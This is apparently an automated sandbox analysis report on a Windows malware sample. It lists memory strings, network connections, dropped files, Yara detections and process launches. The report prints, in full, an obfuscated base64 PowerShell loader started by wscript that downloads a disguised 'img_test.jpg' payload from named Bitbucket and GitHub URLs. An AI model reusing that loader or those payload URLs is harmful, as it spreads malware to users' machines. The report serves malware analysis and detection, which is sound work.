                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000033C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.00000000033C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3ResponseD
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: powershell.exe, 00000004.00000002.2356536853.00000158A8BE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                  Source: powershell.exe, 00000004.00000002.2356536853.00000158A8BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.0000011695FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169AA9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169AAC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169BBE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169AA9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169AAC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                  Source: RegAsm.exe, 0000000A.00000002.2070112434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116963CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
                  Source: powershell.exe, 00000006.00000002.2009787604.0000011699F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                  Source: powershell.exe, 00000006.00000002.2009787604.0000011699F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/4be491a4-012e-46db-bc28-27fee082b0f0/downloads/f4d27c97-7447-
                  Source: powershell.exe, 00000006.00000002.2009787604.0000011699F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                  Source: powershell.exe, 00000006.00000002.2009787604.0000011699F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/rulmerurk/ertertqw/downloads/wil25.txt
                  Source: powershell.exe, 00000004.00000002.2356536853.00000158A912F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.0000011694615000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.0000011694600000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.000001169468B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.0000011695FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009178942.00000116945F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169A611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009611502.00000116948E4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2113417744.00000000058C2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116963CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: powershell.exe, 00000006.00000002.2180041321.00000116A6042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000006.00000002.2180041321.00000116A6042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000006.00000002.2180041321.00000116A6042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabS
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116963CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169AE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169BBE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000006.00000002.2180041321.00000116A6042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                  Source: powershell.exe, 00000004.00000002.2356536853.00000158A912F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.0000011694615000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.0000011694600000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.000001169468B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.0000011695FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009178942.00000116945F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169A611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009611502.00000116948E4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2113417744.00000000058C2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116963CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116963CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116963CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49735 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 52.216.210.153:443 -> 192.168.2.4:49738 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp24C5.tmpJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp24A4.tmpJump to dropped file

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: Process Memory Space: powershell.exe PID: 7476, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7664, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#CJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF7D6FD2C54
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF7D6FD1C0C
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD1D280_2_00007FF7D6FD1D28
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD5D900_2_00007FF7D6FD5D90
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD6CA40_2_00007FF7D6FD6CA4
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD2DB40_2_00007FF7D6FD2DB4
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD66C40_2_00007FF7D6FD66C4
